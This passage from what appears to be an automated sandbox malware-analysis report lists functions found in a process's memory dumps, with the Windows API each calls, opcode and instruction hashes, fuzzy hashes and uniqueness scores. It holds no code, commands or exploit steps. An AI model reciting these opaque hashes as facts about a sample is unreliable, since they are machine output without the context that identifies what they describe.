                                  • Instruction Fuzzy Hash: 64017CB19203409FEB11DF15D8857A2FB94EF05721F0884AADE488B246D775E814CAA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023B0BE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 0023B10E
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: ConsoleCtrlHandler
                                  • String ID:
                                  • API String ID: 1513847179-0
                                  • Opcode ID: 9d67e9e8288aab26e7f7193fe28db7be363d1d969335eea404dba100aebf4039
                                  • Instruction ID: 295689b32095d697a3db8c36ecca5ae70a317135f85a66c3882e655c6d79891d
                                  • Opcode Fuzzy Hash: 9d67e9e8288aab26e7f7193fe28db7be363d1d969335eea404dba100aebf4039
                                  • Instruction Fuzzy Hash: 26016271900600ABD350DF16DC46B26FBA8FB89A20F148159ED085B741D275F515CAE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00571036, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: f507d4984e7b7d10fd4256bd304253d8057f9106458cc4cb0e793dc34316c70c
                                  • Instruction ID: 0adf1c95f5db46caa8d24bd97f7b415fd16ef36ad0d83723055e51fd2c23ad03
                                  • Opcode Fuzzy Hash: f507d4984e7b7d10fd4256bd304253d8057f9106458cc4cb0e793dc34316c70c
                                  • Instruction Fuzzy Hash: 7B018436504B40DFEB208F19E889B66FFA0FF15320F08C49EDD494B652D675E494EB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570EB6, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: DestroyWindow
                                  • String ID:
                                  • API String ID: 3375834691-0
                                  • Opcode ID: 861b8a195434d31bd622e53db0001c4496d9d4db3de5ea0c43e8036d2462bcc1
                                  • Instruction ID: 8026a3db3635e584178f52ebf4a4768ca5592eb61b490d59ded8905f95759664
                                  • Opcode Fuzzy Hash: 861b8a195434d31bd622e53db0001c4496d9d4db3de5ea0c43e8036d2462bcc1
                                  • Instruction Fuzzy Hash: 4801AD35600744CBEB20CF15E885752FFE4EF05720F08C0AADD498B692D271A848EA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570CAE, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 97d73992a495b5baf8ce56f34facfb5c50c58a522b016d9bcb2cccaa2f550c2e
                                  • Instruction ID: 09eb6e2c07bfb6b523090327bde742c6a888249883f649b7b1f3286581846dff
                                  • Opcode Fuzzy Hash: 97d73992a495b5baf8ce56f34facfb5c50c58a522b016d9bcb2cccaa2f550c2e
                                  • Instruction Fuzzy Hash: 2A018B32500744DFEB218F45E888B66FFE0FF19720F08C59ADD490A656D276A858EB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0023A69A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(?), ref: 0023A6CC
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 58c438f5481bec974c432bfa1c57cd80db10c73ba3e1f487475e6bce27c6e23e
                                  • Instruction ID: 2a17fa857777b7f33094953ba7b19b81fdddbffdeaaae62ee1ec2c32772626d9
                                  • Opcode Fuzzy Hash: 58c438f5481bec974c432bfa1c57cd80db10c73ba3e1f487475e6bce27c6e23e
                                  • Instruction Fuzzy Hash: A8F0C275510740DFEF20DF05D88A761FBA4EF05721F08C0AADD494B716D2B9A854DE72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00536CC8, Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: b-{
                                  • API String ID: 0-1408185351
                                  • Opcode ID: ddb8565e1db9c3f78a943546f273be6244d0a08a372ee76e4f09f60becf3056c
                                  • Instruction ID: 5e25f946bf8d3855ab5a995203ea12d67d2aac2129b25fa5fbc3c9cf2fba091c
                                  • Opcode Fuzzy Hash: ddb8565e1db9c3f78a943546f273be6244d0a08a372ee76e4f09f60becf3056c
                                  • Instruction Fuzzy Hash: 9591E574E1120ACBDB04DBA4D981ADDBBF2FF89300F608269D505BB259D731AD46CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005353C0, Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: Li(
                                  • API String ID: 0-122410402
                                  • Opcode ID: 19108949a7f31fcb392c76e860c5528043a18ab7907d82d5946df91df7d9de27
                                  • Instruction ID: 0057fb31181861fce75204b7ddf3559445b16f40c6bd933da43efe238afd1778
                                  • Opcode Fuzzy Hash: 19108949a7f31fcb392c76e860c5528043a18ab7907d82d5946df91df7d9de27
                                  • Instruction Fuzzy Hash: 0441D374E00208EFDF08DFA5D480AEEBBB2BF88300F209465E81577261DB315995DF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005353B1, Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: Li(
                                  • API String ID: 0-122410402
                                  • Opcode ID: d038b9b632a395212a9d09962e9f55259c343a398a96e852823ad504ba4b7a02
                                  • Instruction ID: fb1ec9fc24b6a5f9f710ea6ef192c2fab3d2d904ed1f672b0a506c9c8798421f
                                  • Opcode Fuzzy Hash: d038b9b632a395212a9d09962e9f55259c343a398a96e852823ad504ba4b7a02
                                  • Instruction Fuzzy Hash: FC310274E05208EFCF09DFA4D980AEDBBB2BF88300F20946AD845B72A1D7715985DF21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00570325, Relevance: 1.3, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 00570390
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 8b94a8554789cbaecef1005826044460349816735061e11e4d5e0c1e96ffe712
                                  • Instruction ID: 806c00a813e82914df83473abdb38342183a944e0fb94f32608d1654ee5ed937
                                  • Opcode Fuzzy Hash: 8b94a8554789cbaecef1005826044460349816735061e11e4d5e0c1e96ffe712
                                  • Instruction Fuzzy Hash: 8F218E715093C09FD712CB25DD45B92BFB4EF13220F0984EBE9898F2A3D265A908DB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00530108, Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: d(
                                  • API String ID: 0-4079524267
                                  • Opcode ID: df1f2f45aadc1eb73bbc9008887ffef927399e164a86d116252ed0b5b8a35585
                                  • Instruction ID: 9efa977bd6f1caf626d3b8291e7d65bf35faa6148faf704893e5515bb3c3dfd2
                                  • Opcode Fuzzy Hash: df1f2f45aadc1eb73bbc9008887ffef927399e164a86d116252ed0b5b8a35585
                                  • Instruction Fuzzy Hash: 39112178A1160ADFCB04FFB4E94999DBBB1EF40308F504168D80197269DB706E19DF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0057035E, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 00570390
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 2f1cdaf45e9d21336606d0321f80295c2ee444c24ccc2e302666c9ec62075fb1
                                  • Instruction ID: e2f178c9de33ca5ba7a345f139f174e7e2166eef27c64fa0192ec3d7985d7a3d
                                  • Opcode Fuzzy Hash: 2f1cdaf45e9d21336606d0321f80295c2ee444c24ccc2e302666c9ec62075fb1
                                  • Instruction Fuzzy Hash: 1701DF71500740CFEB10CF15E885B96FFE4EF11320F08C8AADC0D8B682D271A804DA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00535789, Relevance: .1, Instructions: 144COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 29fba9a3efae48d66bbfd257dd66d347b2d0bd8baa05a5695c2bf24feddc0e7f
                                  • Instruction ID: b895be6a027f4ec6ddd13567eca10e77526506d7fdbaf6a9d527c28336f77ed2
                                  • Opcode Fuzzy Hash: 29fba9a3efae48d66bbfd257dd66d347b2d0bd8baa05a5695c2bf24feddc0e7f
                                  • Instruction Fuzzy Hash: C061A3B4E01208CFCB08DFA9D85499DBBF2FF89300F24806AD819AB365DB349945CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00535968, Relevance: .1, Instructions: 114COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1cb89620efb43056846b32fc83364a4dac5dce61c24ca4769945e298896daccb
                                  • Instruction ID: caefd0f2e956a7d63692c62d5ca0d7b12e4cc892e7389660b10e9a788cb10527
                                  • Opcode Fuzzy Hash: 1cb89620efb43056846b32fc83364a4dac5dce61c24ca4769945e298896daccb
                                  • Instruction Fuzzy Hash: 384114B5E01208DFCB04DFA9C444A9DBBF2BF89310F2491AAD819AB361E7359D41CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0028A3AC, Relevance: .1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62f9fca687ca7da32977ee5be45b0a7d36e81d3719a3cbb6db59921e99f29f6a
                                  • Instruction ID: 353f7e28a206a3836c14499300f334ffe631f8b5058e099ef5a11417318589f3
                                  • Opcode Fuzzy Hash: 62f9fca687ca7da32977ee5be45b0a7d36e81d3719a3cbb6db59921e99f29f6a
                                  • Instruction Fuzzy Hash: F621B5B6505344BFD3108F06AC45E63FBA8EB85670F08C86EFD499B611D276B8048BB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0028AAC8, Relevance: .1, Instructions: 83COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 72b7f11a1c092f949ee8c000aac80a0e4a63aadb5474c918e2b697fbc1498791
                                  • Instruction ID: 56f5457f4556905ae014e61162bf003e5709846ec03b2e6388cdbbcd1ca8f380
                                  • Opcode Fuzzy Hash: 72b7f11a1c092f949ee8c000aac80a0e4a63aadb5474c918e2b697fbc1498791
                                  • Instruction Fuzzy Hash: 9E316FB550E3C19FD302CF259850A56BFF4EF4A214F0889DFE8C8DB252D275A908CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0028A191, Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13969fcf1be27ff2d5f26cb12088954acde21bbf5ab84a607d55c05bf8c4a5ef
                                  • Instruction ID: 6c7bb82943c20a09dea1f347bcacd6682108d249caed551781b252c517391d2f
                                  • Opcode Fuzzy Hash: 13969fcf1be27ff2d5f26cb12088954acde21bbf5ab84a607d55c05bf8c4a5ef
                                  • Instruction Fuzzy Hash: E421C576605344AFD7108F069C45E63FFA8EB86670F08C46FFD099B612D276A8048BB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053B635, Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 72b59a7e07bb8ea8b71994208b0e9740dd70aee5156971736ba66042b0ee6c90
                                  • Instruction ID: 4dda1c02c47bc68b947931ed8df142e02b47bd952ddac7fe0b25fbd48e545918
                                  • Opcode Fuzzy Hash: 72b59a7e07bb8ea8b71994208b0e9740dd70aee5156971736ba66042b0ee6c90
                                  • Instruction Fuzzy Hash: 22314870A06209EFDB40EF68E984A9DFBF2FF88314F54C4A5D5059B265C7309A45DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053B5C8, Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e394b1f3c4cfff64c7e1ee45bbc75c23ce69fcfd7fe245ebeedcadaad41d5450
                                  • Instruction ID: 878be6fb8bfb6ba800e97eee71133898893497864a9d7166fb8102a3bcf96d47
                                  • Opcode Fuzzy Hash: e394b1f3c4cfff64c7e1ee45bbc75c23ce69fcfd7fe245ebeedcadaad41d5450
                                  • Instruction Fuzzy Hash: 9131BF70906209EFEB00EFA8E58499DFBF1FF84314F54C4A9D5059B266DB309E45EB84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0028A716, Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2fc23f74a330221455aba75322e74266737d9da12b64845ffd104f71e16bb23
                                  • Instruction ID: 4d0fd5f8676d132367bb37f64abaaedd0336b23ebab923555bdfe00f13022cca
                                  • Opcode Fuzzy Hash: b2fc23f74a330221455aba75322e74266737d9da12b64845ffd104f71e16bb23
                                  • Instruction Fuzzy Hash: 72214FB6644300AFD350CF06EC41A57FBE8EB89670F14C92EFD5897701E276A9148BB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0028A96E, Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3bae374916717063eefc8268d6cbe88eef603ef18da5d4311d8301a6f6d7db47
                                  • Instruction ID: 1611d789f5bd19a0ab8e8da563a24b86dee4dea9788af5609535f22e7e1e7c27
                                  • Opcode Fuzzy Hash: 3bae374916717063eefc8268d6cbe88eef603ef18da5d4311d8301a6f6d7db47
                                  • Instruction Fuzzy Hash: 71214FB6604300AFD350CF06EC41A57FBE8EB89670F14C92EFD5897701E276A9148BB6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00537441, Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b76ecd873fd2194d20b48e18f0206bde65532857a3c66d727d6b67a4f51269f
                                  • Instruction ID: 41b6a0ba20c1935a50b782d61a831c8d465ab814c4ab02a11bb9959c1ea9a3ca
                                  • Opcode Fuzzy Hash: 0b76ecd873fd2194d20b48e18f0206bde65532857a3c66d727d6b67a4f51269f
                                  • Instruction Fuzzy Hash: 783149B0E08209DFCB15CFA5D5809AEFFB2FF89300F25899AC405AB255D730AA50DF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053E4E0, Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7676c200db035ad592d5a7426dbc36303f3a66371464309b46af2e77d0156f05
                                  • Instruction ID: 683ee3d500d343a73f8f14d47acc5253ee9d164c4dae7eba4b78788deb6562f6
                                  • Opcode Fuzzy Hash: 7676c200db035ad592d5a7426dbc36303f3a66371464309b46af2e77d0156f05
                                  • Instruction Fuzzy Hash: 4031C378E04209CFCB04DFA5C585AEDBBF1BF88314F108469E815A7390EB34AA41DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0028A3D2, Relevance: .1, Instructions: 69COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c8ed2e54506bb6de6657ff95d65055153fab74a7108c6ed50051c435782c719
                                  • Instruction ID: cb428b2d918fc086c4e393de2f0516ac764577d2d8649a074ea32794326e765c
                                  • Opcode Fuzzy Hash: 9c8ed2e54506bb6de6657ff95d65055153fab74a7108c6ed50051c435782c719
                                  • Instruction Fuzzy Hash: 8B118176644300AFD710CE06EC41E63FBA8EB85A70F18C96AFD095B711E276B5148AB6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00537350, Relevance: .1, Instructions: 66COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 662a4cf6c5b3d75dea005e67028feb23453447b74b8f95c0a6980c738c435d5e
                                  • Instruction ID: 6cbd2e66b3dc80931bebf169d50fdf4c34d847b1a91a2e1653701ced21b03420
                                  • Opcode Fuzzy Hash: 662a4cf6c5b3d75dea005e67028feb23453447b74b8f95c0a6980c738c435d5e
                                  • Instruction Fuzzy Hash: 7121B3B4E04209DFDB54CF99D4809AEBBF5FF48300F20986AD819A7755D338AA41DFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0028A640, Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d37d4a80ef554e450ae2b4a15c7bc25c4ed72b1b304ef01456194e058624c859
                                  • Instruction ID: bacbe66cadbb091b94cfbd3d3d6cae8b5781a0b2dc48c7ce1af8b6c12ac34e3c
                                  • Opcode Fuzzy Hash: d37d4a80ef554e450ae2b4a15c7bc25c4ed72b1b304ef01456194e058624c859
                                  • Instruction Fuzzy Hash: 2C2151B550D3806FD302CF159C51A57BFF4EF87620F0989DAF8889B253D235A904CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0028A1BA, Relevance: .1, Instructions: 64COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3432639b40bd7e35c3a8809cbcba7ae8f53656eaf364eed5eaa001ceaf2e245
                                  • Instruction ID: 270289501c3f774a186826fbaf30fa1b9a42fc38e896a7b16a8c623cef5dda0c
                                  • Opcode Fuzzy Hash: a3432639b40bd7e35c3a8809cbcba7ae8f53656eaf364eed5eaa001ceaf2e245
                                  • Instruction Fuzzy Hash: A111C676640304BFD7508E06AC45FA3FB98EB85B70F18C46AFD0D5B601D276B5148AB6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00240984, Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117525663.0000000000240000.00000040.00000040.sdmp, Offset: 00240000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e5516f333d23fe0ff36374e3f7a96bd46dd4ae1e0b5820943e0dc9e28e50d88c
                                  • Instruction ID: 4be1ab20c08c21b9d95be72e7d088394ee77ac5a4e8ebda8bd61192267e30ef3
                                  • Opcode Fuzzy Hash: e5516f333d23fe0ff36374e3f7a96bd46dd4ae1e0b5820943e0dc9e28e50d88c
                                  • Instruction Fuzzy Hash: E011D235214344DFE319CF10C980F15B791AB89B08F24C5ADEA490B683C77B9852DA81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053F350, Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a242ea5f5a8959cc8fa0be6ef8f7c10032747aa054d1ebe19e08d79bb40cd85
                                  • Instruction ID: 04e03a3c1ac035ac38aa51bd847774ace1bccc88c11f70d82ad56d03c3c5db97
                                  • Opcode Fuzzy Hash: 4a242ea5f5a8959cc8fa0be6ef8f7c10032747aa054d1ebe19e08d79bb40cd85
                                  • Instruction Fuzzy Hash: C1114971D15248EFCB04DFA4E9855ACBFB0FB4A301F2089EAD855E7265D3349A00CF52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0028AB09, Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ed9493b46f82c42dd2504384330fe3f15f3c0008b08204d1320d6bc3c60c2fc7
                                  • Instruction ID: 1298f48c5e23a0ea3bf0ce56d31912e1987d0a3db406d51dda77365bb79cbc22
                                  • Opcode Fuzzy Hash: ed9493b46f82c42dd2504384330fe3f15f3c0008b08204d1320d6bc3c60c2fc7
                                  • Instruction Fuzzy Hash: 1F11D7B5908341AFD340CF19D881A5BFBE4FB89660F04896EF99897311E375E9048FA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053CAD0, Relevance: .1, Instructions: 54COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2c7a79ae2264e9931eae5e55a213adaefa47cac2b3f6739031534a4b7a52f7b
                                  • Instruction ID: ced7f7875b8f01cd32efe2c9cb17886ca64bda391ec9a2fb820757095098f445
                                  • Opcode Fuzzy Hash: a2c7a79ae2264e9931eae5e55a213adaefa47cac2b3f6739031534a4b7a52f7b
                                  • Instruction Fuzzy Hash: 5921D3B4E05209DFCB04DFA9D9855AEFBF2FB88300F20856AD805B7354D7349A408B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00538E78, Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38fbdbfba5e9612bda519d0dec70061990bd115909e2fa6fe2931acf86b3fdab
                                  • Instruction ID: aad018a23896fa8f132bd1482725fb96c8eb64a101e3b854263ba0484e43d81c
                                  • Opcode Fuzzy Hash: 38fbdbfba5e9612bda519d0dec70061990bd115909e2fa6fe2931acf86b3fdab
                                  • Instruction Fuzzy Hash: 48113A70E043099BD709CFA5D8449AEFBF6FF89300F14C5AAE4549B255EB309A44EB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0028A118, Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab20ec4ea38d1ceec39d319ef2de67b3a652fd0cce413dfc2db44b92137bc02b
                                  • Instruction ID: 9dc027fc1e618f0ac8e4a0cef70fa76b4f8f41d064ddee04c0b5021943fb8225
                                  • Opcode Fuzzy Hash: ab20ec4ea38d1ceec39d319ef2de67b3a652fd0cce413dfc2db44b92137bc02b
                                  • Instruction Fuzzy Hash: AE01D4B150E3C06FD3128B255C55B92BF78DF43660F0884CBE9889F193D2166909C7B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002407F8, Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117525663.0000000000240000.00000040.00000040.sdmp, Offset: 00240000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0e42ab2013611ecf3a3063b2722589e5839bc40bc032df35e7492c96a6eee1ea
                                  • Instruction ID: af856ff62db3b1994b424602f65b1d2ab05844a6a7b7fe06b6b37f75ccbd09f5
                                  • Opcode Fuzzy Hash: 0e42ab2013611ecf3a3063b2722589e5839bc40bc032df35e7492c96a6eee1ea
                                  • Instruction Fuzzy Hash: B501AE765093805FD711CF15DC44963FFA8DF47660B49C09FEC498B612D225B504C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401258, Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117803755.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33f60fba8cc7446ec481ec26bc04934455f3f4ff6d6857e23063b41a13c1fc2f
                                  • Instruction ID: 7ecc698a49020586d057b48fda31939ce759a287ee6938a47a54316519359a5b
                                  • Opcode Fuzzy Hash: 33f60fba8cc7446ec481ec26bc04934455f3f4ff6d6857e23063b41a13c1fc2f
                                  • Instruction Fuzzy Hash: 3701173180622ACECB20DF54D9447EDB7B0FB5A342F1059EBC00AF6161D3395A86CF19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053F3A8, Relevance: .0, Instructions: 44COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 837e36a7c175b6d36c1426bb769a31518a4db95ea8efd35b150c6089396eb8b1
                                  • Instruction ID: d1ce11e3ec70ef23093636683cec03f5a0e833f6eff41aa23053fc9694424dad
                                  • Opcode Fuzzy Hash: 837e36a7c175b6d36c1426bb769a31518a4db95ea8efd35b150c6089396eb8b1
